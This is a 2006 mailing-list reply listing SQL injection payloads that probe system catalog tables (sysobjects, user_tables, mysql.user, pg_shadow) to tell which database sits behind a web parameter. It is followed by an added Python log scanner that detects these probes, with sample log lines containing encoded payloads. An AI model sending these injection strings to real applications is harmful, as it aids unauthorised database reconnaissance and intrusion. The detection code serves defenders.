RE: SQL injection (or not?)

From: Tonnerre Lombard (tonnerre.lombard@sygroup.ch)
Date: Thu Aug 10 2006 - 00:31:08 EDT


Hi,

On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez
wrote:
> Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a
>
> If it returns a valid value the database is SQL Server
>
>
> Parameter=[valid value]' and exists(select * from user_tables) and 'a'='a
>
> If it returns a valid value the database is Oracle
>
>
> Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a
>
>
> If it returns a valid value the database is MySQL

Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a

should tell you it's PostgreSQL.

                                Tonnerre

-- 
SyGroup GmbH
Tonnerre Lombard
Loesungen mit System
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard@sygroup.ch
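
For defenders, an added example that is not part of the original post: a Python scan of web access logs for the catalog-table probes listed in this thread, reporting which DBMS each probe targets and which clients tried more than one. The combined log format, the sample lines and the function names are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Catalog objects named in the thread, mapped to the DBMS each one identifies.
CATALOG_MARKERS = {"sysobjects": "SQL Server", "user_tables": "Oracle",
                   "mysql.user": "MySQL", "pg_shadow": "PostgreSQL"}
# exists(select ... from <catalog object>), any letter case, any whitespace.
PROBE_RE = re.compile(
    r"exists\s*\(\s*select\b.*?\bfrom\s+("
    + "|".join(re.escape(name) for name in CATALOG_MARKERS) + r")\b",
    re.IGNORECASE | re.DOTALL)
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')


def find_probes(log_lines):
    """Return (client, parameter, dbms, status) per probe in a decoded query string."""
    findings = []
    for line in log_lines:
        parsed = LINE_RE.match(line)
        if not parsed:
            continue
        client, target, status = parsed.group(1, 2, 3)
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hit = PROBE_RE.search(value)
            if hit:
                dbms = CATALOG_MARKERS[hit.group(1).lower()]
                findings.append((client, name, dbms, int(status)))
    return findings


def fingerprinting_clients(findings, min_dbms=2):
    """Clients whose probes covered at least min_dbms different DBMSs."""
    seen = defaultdict(set)
    for client, _param, dbms, _status in findings:
        seen[client].add(dbms)
    return {c: sorted(d) for c, d in seen.items() if len(d) >= min_dbms}


# Constructed sample log lines (documentation addresses), not from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2006:00:31:08 +0000] "GET /item?id=42 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Aug/2006:00:31:09 +0000] "GET /item?id=42%27+and+exists(select+*+from+sysobjects)+and+%27a%27%3D%27a HTTP/1.1" 500 0',
    '192.0.2.10 - - [10/Aug/2006:00:31:10 +0000] "GET /item?id=42%27+AND+EXISTS(SELECT+*+FROM+pg_shadow)+AND+%27a%27%3D%27a HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Aug/2006:00:32:00 +0000] "GET /search?q=pg_shadow+permissions HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(fingerprinting_clients(find_probes(SAMPLE_LOG)))
```

The status field lets an analyst see which probe received a normal response, the "valid value" the thread describes. Probes sent in POST bodies do not appear in access logs and need application or WAF logging instead.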



